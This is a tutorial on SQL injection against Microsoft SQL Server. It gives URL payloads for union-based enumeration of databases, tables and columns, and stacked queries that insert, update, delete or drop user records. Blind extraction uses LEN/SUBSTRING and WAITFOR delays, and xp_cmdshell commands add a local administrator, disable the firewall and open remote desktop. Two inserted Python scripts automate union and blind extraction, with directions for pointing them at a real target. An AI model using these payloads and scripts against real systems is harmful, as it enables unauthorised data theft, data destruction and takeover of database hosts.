MSSQL Server injection tutorial – All things in moderation

MSSQL Server injection tutorial

In this tutorial, I will show you how to attack a Microsoft SQL Server back end using the SQL injection techniques that MS SQL Server supports.

Types of Injection for MS SQL Server

1. Union query
2. Stacked query
3. Boolean-based Blind
4. Time-based Blind Injection
5. Stored procedure injection

For example, consider the following URL:

http://example.com/news.asp?id=1

Suppose the server concatenates the id parameter straight into the query and executes the following:

SELECT title, content FROM news WHERE new_id=<id>

1. Check for vulnerability

Before testing for SQL injection, we need to know the comment sequences MSSQL accepts: -- (line comment), --+ and --+- (the same, with the space URL-encoded as +), /**/ (inline comment) and ;%00 (null byte).

We append to the end of the URL some characters like ' (single quote), " (double quote) or a comment sequence:

http://example.com/news.asp?id=1'

If we get an error like “Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ''. /news.asp, line 5”, the parameter reaches the query unquoted and we have a SQL injection vulnerability. A page that shows no error is not necessarily safe: the application may be hiding errors, which is the case the blind techniques below handle.

2. Injection

Technique 1: UNION query

  • Find the number of columns:

    To find the number of columns we use an ORDER BY clause with a column position; MSSQL errors as soon as the position exceeds the SELECT list.

    http://example.com/news.asp?id=1 ORDER BY 1;-- - <-- no error
    http://example.com/news.asp?id=1 ORDER BY 2;-- - <-- no error
    http://example.com/news.asp?id=1 ORDER BY 3;-- - <-- error

    We get a message like “The ORDER BY position number 3 is out of range of the number of items in the select list.”
    That means the query selects 2 columns, because we got an error at 3.

  • Check for UNION query:

    With a UNION query we can append our own SELECT to the original one, as long as it returns the same number of columns with compatible types. A negative id makes the original SELECT return no rows, so only our row is shown:

    http://example.com/news.asp?id=-1 UNION ALL SELECT 1,2; -- -

    (we already found that the number of columns is 2 in the section “find number of columns”)
    If we see one of the numbers on the page, i.e. 1 or 2, then the UNION works, and the number tells us which column is reflected. If instead we get a conversion error, one of the original columns is not numeric; use NULL as the placeholder (NULL is compatible with every type) and try again.

  •  Exploit:

    – Check the MSSQL version, current database and user name

    Let's say that column 2 is the one reflected on the page. We replace the number 2 with @@version, db_name() or user (user is the database user; system_user gives the login name). The reflected column must accept a string, otherwise MSSQL returns a conversion error and we have to pick another reflected column.
    It should look like this:

    http://example.com/news.asp?id=-1 UNION ALL SELECT 1,@@version; -- -
    http://example.com/news.asp?id=-1 UNION ALL SELECT 1,db_name(); -- -
    http://example.com/news.asp?id=-1 UNION ALL SELECT 1,user; -- -

    – Enumerate database, table and column names.
    Note that the page usually renders only the first row of the result set. To walk through all rows, add TOP 1 to the injected SELECT and a NOT IN filter listing the names already retrieved.

    1. Enumerate databases
    MSSQL server query: SELECT name FROM master..sysdatabases;

    We will have the URL:

    http://example.com/news.asp?id=-1 UNION ALL SELECT 1,name FROM master..sysdatabases; -- -

    2. Enumerate tables
    MSSQL server query: SELECT name FROM testdb..sysobjects WHERE xtype = 'U'; (xtype 'U' selects user tables; replace testdb with a database name found in the previous step)

    We will have the URL:

    http://example.com/news.asp?id=-1 UNION ALL SELECT 1,name FROM testdb..sysobjects WHERE xtype='U'; -- -

    3. Enumerate columns
    MSSQL server queries:
    SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tbl_name'); -- for the current DB only
    SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='tbl_name'; -- column names and types for a table in the master database

    We will have the URL:

    http://example.com/news.asp?id=-1 UNION ALL SELECT 1,name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tbl_name'); -- -
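
The quote test from section 1 and the ORDER BY walk, UNION marker row and extraction step above are a procedure a tester normally scripts. The following is an added example, not code from the original page: a small Python driver that runs those steps against a constructed stand-in for news.asp. The stand-in concatenates the id parameter into the query and uses an in-memory SQLite database so the example runs offline; vulnerable_page, the sample news rows and sqlite_version() as a replacement for @@version are all assumptions made for the demonstration, while the probing logic is what you would point at an MSSQL target.

```python
import sqlite3

# Constructed stand-in for the vulnerable news.asp page (assumption, not a real
# server). The id parameter is concatenated straight into the query, as the
# tutorial's example assumes. SQLite is used only so this runs offline; the
# probing logic below is the same against MSSQL.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE news (new_id INTEGER, title TEXT, content TEXT)")
_conn.executemany("INSERT INTO news VALUES (?, ?, ?)",
                  [(1, "Hello", "First post"), (2, "Second", "More text")])


def vulnerable_page(id_param):
    """Returns (error_message_or_None, rows), the way an unhardened page
    either leaks the DB error or renders the result set."""
    sql = "SELECT title, content FROM news WHERE new_id=" + id_param
    try:
        return None, _conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return str(exc), []


def is_injectable(page):
    """Section 1: a lone quote that produces a DB error means the parameter
    reaches the query unquoted."""
    err, _ = page("1'")
    return err is not None


def find_column_count(page, max_cols=32):
    """Walk ORDER BY 1, 2, ... until the server errors; the last position
    that worked is the number of columns in the SELECT list."""
    for n in range(1, max_cols + 1):
        err, _ = page(f"1 ORDER BY {n} -- -")
        if err:
            return n - 1
    return None  # no error up to max_cols: ORDER BY is probably not reaching the DB


def find_reflected_columns(page, ncols):
    """UNION a row of distinct markers and report which positions show up
    in the page; those are the columns we can read data through."""
    markers = [str(1000 + i) for i in range(ncols)]
    _, rows = page("-1 UNION ALL SELECT " + ",".join(markers) + " -- -")
    body = " ".join(str(v) for row in rows for v in row)
    return [i + 1 for i, m in enumerate(markers) if m in body]


def union_extract(page, ncols, col, select_tail):
    """Put an expression (against MSSQL e.g. "@@version" or
    "name FROM master..sysdatabases") into the reflected column and NULL
    everywhere else, so a mismatching placeholder cannot trigger a type
    conversion error. Returns the value from that column for every row."""
    cols = ["NULL"] * ncols
    cols[col - 1] = select_tail
    err, rows = page("-1 UNION ALL SELECT " + ",".join(cols) + " -- -")
    if err:
        raise RuntimeError(err)
    return [row[col - 1] for row in rows]


if __name__ == "__main__":
    assert is_injectable(vulnerable_page)
    n = find_column_count(vulnerable_page)              # 2 for the stand-in
    shown = find_reflected_columns(vulnerable_page, n)  # [1, 2] for the stand-in
    # Against MSSQL the tail would be "@@version"; sqlite_version() is the stand-in here.
    print(union_extract(vulnerable_page, n, shown[-1], "sqlite_version()"))
    print(union_extract(vulnerable_page, n, shown[-1],
                        "name FROM sqlite_master WHERE type='table'"))
```

To use this against a real target, replace vulnerable_page with a function that sends the HTTP request and returns (error text found in the body, values rendered on the page); everything else stays as it is.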

    Technique 2: Stacked query

    MSSQL executes multiple statements sent in one batch, separated by semicolons, and most client libraries (ADO in classic ASP included) send the concatenated query string as one batch. So a semicolon lets us append statements that modify data, not only read it. Examples, assuming a tblusers(username, password) table found in the enumeration step:

    http://example.com/news.asp?id=-1; INSERT INTO tblusers values('admin', 'admin'); -- -
    http://example.com/news.asp?id=-1; UPDATE tblusers SET password='newpassword' WHERE username='admin'; -- -
    http://example.com/news.asp?id=-1; DELETE FROM tblusers where username='admin'; -- -
    http://example.com/news.asp?id=-1; DROP TABLE tblusers; -- -
    ...
    

    Technique 3: Boolean-based Blind

    In a well-built production application you generally cannot see error responses or query output on the page, so you cannot extract data through UNION or error-based attacks. You have to use blind SQL injection, which extracts one yes/no answer per request.

    Suppose the id parameter is injectable as shown above and what we want is the value of the username field. The tests will extract that value character by character, using functions present in practically every database. For MSSQL these are:

    SUBSTRING(string, start, length): returns the substring of length "length" starting at position "start" (1-based). If "start" is beyond the end of the string, MSSQL returns an empty string.

    ASCII(char): returns the ASCII code of the first character of its argument. For an empty string it returns NULL, so any comparison against it is not true; that is how we notice we have run past the end of the string.

    LEN(string): returns the number of characters in the input text (trailing spaces excluded).

    We test the first character and, once we have found its value, move on to the second and so on, until we have the whole string. The question is asked inside the WHERE clause of a request that normally returns a row (id=1): the page shows the article when the condition is true and nothing when it is false. The subquery must be wrapped in its own pair of parentheses, otherwise MSSQL reports a syntax error.
    First we find the length of the string with LEN:

    http://example.com/news.asp?id=1 AND LEN((SELECT TOP 1 username FROM tblusers))=5 ; -- -

    Then we find each character of the string with ASCII and SUBSTRING, testing one value at a time (or narrowing the range faster with > and < comparisons):

    http://example.com/news.asp?id=1 AND ASCII(SUBSTRING((SELECT TOP 1 username FROM tblusers),1,1))=97 ; -- -

    Technique 4: Time-based Blind

    Like boolean-based blind, time-based blind uses SUBSTRING, ASCII and LEN to discover one character at a time until the end of the string. The difference is that the answer is read from the time the web application takes to respond rather than from the page content, so it works even when true and false produce identical pages. A typical approach uses the WAITFOR DELAY command ('hh:mm:ss'), usually in a stacked query:

    ex: IF EXISTS (SELECT * FROM tblusers) WAITFOR DELAY '0:0:5'

    Example, we will use the following values for id. As before, the subquery needs its own pair of parentheses.
    First we find the length of the string with LEN:

    http://example.com/news.asp?id=-1; IF LEN((SELECT TOP 1 username FROM tblusers))=5 WAITFOR DELAY '0:0:5'; -- -

    Then we find each character of the string with ASCII and SUBSTRING:

    http://example.com/news.asp?id=-1; IF ASCII(SUBSTRING((SELECT TOP 1 username FROM tblusers),1,1))=97 WAITFOR DELAY '0:0:5'; -- -

    A response that takes about five seconds longer than the baseline means the condition is true. Measure the baseline first and repeat borderline requests, since network jitter can look like a delay.
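
Both blind techniques (boolean-based above and time-based here) reduce to the same loop: ask the server a yes/no question about LEN() and about each ASCII(SUBSTRING()) value, read the answer from either the page content or the response time, and move to the next character. The following is an added Python example, not code from the original page, that implements that loop with a binary search over the character range (seven requests per character instead of up to 127 equality tests as in the text), which goes slightly beyond the page's one-value-at-a-time method. The server side is a constructed stand-in: tblusers, the username 'admin', the regexes that evaluate the two condition shapes, the HTML marker and the 0.05 s simulated delay are all assumptions; only the payload builders produce real MSSQL syntax.

```python
import re
import time

# MSSQL fragments the extractor injects. The doubled parentheses around the
# subquery are required: LEN(SELECT ...) without them is a syntax error.
SUBQUERY = "(SELECT TOP 1 username FROM tblusers)"


def len_condition(op, n):
    return f"LEN({SUBQUERY}){op}{n}"


def char_condition(pos, op, code):
    return f"ASCII(SUBSTRING({SUBQUERY},{pos},1)){op}{code}"


def boolean_payload(cond):
    # id=1 is a real article, so the page renders it only when cond is true
    return f"1 AND {cond} -- -"


def time_payload(cond, seconds=5):
    # stacked form: the WHERE clause is irrelevant, the delay carries the answer
    return f"-1; IF {cond} WAITFOR DELAY '0:0:{seconds}' -- -"


def _binary_search(ask, hi):
    """Smallest x in [0, hi] for which ask('>', x) is False, i.e. the hidden value."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(">", mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_length(oracle, max_len=64):
    return _binary_search(lambda op, n: oracle(len_condition(op, n)), max_len)


def extract_char(oracle, pos):
    return chr(_binary_search(lambda op, c: oracle(char_condition(pos, op, c)), 127))


def extract_string(oracle):
    """oracle(condition) -> True/False; works for boolean and time-based alike."""
    return "".join(extract_char(oracle, i) for i in range(1, extract_length(oracle) + 1))


# ---- constructed stand-in for the target (assumption, not a real server) ----
_SECRET_USERNAME = "admin"
_LEN_RE = re.compile(r"LEN\(\(SELECT TOP 1 username FROM tblusers\)\)([=<>])(\d+)")
_CHAR_RE = re.compile(
    r"ASCII\(SUBSTRING\(\(SELECT TOP 1 username FROM tblusers\),(\d+),1\)\)([=<>])(\d+)")


def fake_server_evaluates(cond):
    """Evaluates the two condition shapes above the way MSSQL would."""
    m = _LEN_RE.fullmatch(cond)
    if m:
        left, op, right = len(_SECRET_USERNAME), m.group(1), int(m.group(2))
    else:
        m = _CHAR_RE.fullmatch(cond)
        if m is None:
            raise ValueError("unsupported condition: " + cond)
        pos, op, right = int(m.group(1)), m.group(2), int(m.group(3))
        if pos > len(_SECRET_USERNAME):
            # SUBSTRING past the end is '', ASCII('') is NULL, so no comparison is true
            return False
        left = ord(_SECRET_USERNAME[pos - 1])
    return {"=": left == right, ">": left > right, "<": left < right}[op]


def fake_boolean_page(payload):
    """news.asp?id=<payload>: renders the article only when the WHERE clause holds."""
    m = re.fullmatch(r"1 AND (.+) -- -", payload)
    return "<h1>Hello</h1>" if m and fake_server_evaluates(m.group(1)) else "No article found"


def fake_time_page(payload, delay=0.05):
    """Stacked-query case: returns the response time; sleeps when the IF fires."""
    m = re.fullmatch(r"-1; IF (.+) WAITFOR DELAY '0:0:\d+' -- -", payload)
    start = time.perf_counter()
    if m and fake_server_evaluates(m.group(1)):
        time.sleep(delay)
    return time.perf_counter() - start


def boolean_oracle(cond):
    return "<h1>Hello</h1>" in fake_boolean_page(boolean_payload(cond))


def time_oracle(cond, threshold=0.025):
    return fake_time_page(time_payload(cond)) >= threshold


if __name__ == "__main__":
    print(extract_string(boolean_oracle))  # admin
    print(extract_string(time_oracle))     # admin
```

Against a real target, boolean_oracle and time_oracle become HTTP requests: the first checks for a marker that only appears on the "true" page, the second compares the measured round-trip time with a threshold derived from the baseline latency, and the same extract_string drives both.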

    Technique 5: Stored procedure

  • Useful stored procedures include:
    • xp_cmdshell executes an operating-system command through a Windows command shell on the server, with the permissions of the SQL Server service account (or of the xp_cmdshell proxy account for non-sysadmin callers), and returns any output as rows of text. By default only sysadmin is allowed to use it, and since SQL Server 2005 it is disabled by default (it can be enabled again using sp_configure).
    • xp_regread reads an arbitrary value from the Registry (undocumented extended procedure).
    • xp_regwrite writes an arbitrary value into the Registry (undocumented extended procedure).
    • sp_makewebtask writes the result of a query to an HTML file at a path chosen by the caller, which has been abused to drop files on the server. It requires sysadmin privileges and has been removed from recent SQL Server versions.
    • xp_sendmail sends an e-mail message, which may include a query result set attachment, to the specified recipients. This extended stored procedure uses SQL Mail to send the message.

  • Example: xp_cmdshell

    1. Enable xp_cmdshell (requires sysadmin):

    -- To allow advanced options to be changed.
    EXEC sp_configure 'show advanced options', 1;
    -- To update the currently configured value for advanced options.
    RECONFIGURE;
    -- To enable the feature.
    EXEC sp_configure 'xp_cmdshell', 1;
    -- To update the currently configured value for this feature.
    RECONFIGURE;

    As a stacked-query payload for the id parameter:

    -1; EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- -

    2. Add a local administrator, disable the firewall and open remote desktop. These commands only succeed if the SQL Server service account has local administrator rights on the host:

    EXECUTE master..xp_cmdshell 'net user abc 123456 /ADD';

    EXECUTE master..xp_cmdshell 'net localgroup Administrators abc /ADD';

    EXECUTE master..xp_cmdshell 'netsh firewall set opmode disable';

    EXECUTE master..xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f';

    netsh firewall is the legacy Windows XP / Server 2003 syntax; on Windows Vista and later the equivalent is netsh advfirewall set allprofiles state off.

  • References

MS SQL Server injection cheat sheet: http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet

OWASP Testing Guide v4, Testing for SQL Server: https://www.owasp.org/index.php/Testing_for_SQL_Server
